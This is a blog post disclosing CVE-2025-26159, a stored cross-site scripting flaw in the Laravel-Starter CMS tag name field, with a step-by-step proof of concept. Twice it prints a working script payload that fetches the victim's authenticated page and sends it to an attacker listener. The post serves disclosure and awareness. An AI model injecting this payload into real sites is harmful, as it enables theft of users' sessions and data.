Post

CVE-2025-26159

CVE-2025-26159 Explotation

Posted Updated
Preview Image
By BADTRY
1 min read

Discovered by: Fernando González Perea

CVE-2025-26159 is a Stored Cross-Site Scripting (XSS) vulnerability in the Laravel-Starter CMS, specifically within the tag name field. This vulnerability allows an attacker to inject and execute malicious JavaScript code in the browsers of users who visit the affected tag details page.

The issue impacts versions prior to v11.11.0 and arises due to improper sanitization of user input, which is stored on the server without adequate validation.

An attacker can take advantage of this vulnerability to steal cookies in the server by creating a a tag with the following payload in the name field.

1

<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>

Proof of Concept

To abuse this vulnerability we will just need control over an user with the following permissions.

Pic

Now let’s create the malicious tag. With the user account, we can go to Admin Dashboard > Tags

Pic

Pic

Now, we can inject the malicious payload into the “name” field, also remember to add random data to the next fields.

1

<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>

Pic

Once the tag has been created, any user who visits the detailed page will execute the JavaScript code in his browser, but to get his cookies, we need to create a HTTP server, get the content of the web, decode it from url encode and search for the cookies. To make it easier, I have write this script in Go that make all this.

Pic

And lastly, when the user clicks on “View details” bottom, we will get his cookies.

Pic

Pic

As of the date of this publication, the vulnerability remains unpatched by the vendor. {: .prompt-warning }

Despite multiple attempts to responsibly disclose the issue, the developer has failed to respond or take action. This post is being published to raise awareness among users and administrators who rely on this software, so they can take appropriate mitigation steps on their own.

References

  • https://nvd.nist.gov/vuln/detail/CVE-2025-26159
  • https://www.cve.org/CVERecord?id=CVE-2025-26159
  • https://github.com/nasirkhan/laravel-starter
Deep Dives
cve
This post is licensed under CC BY 4.0 by the author.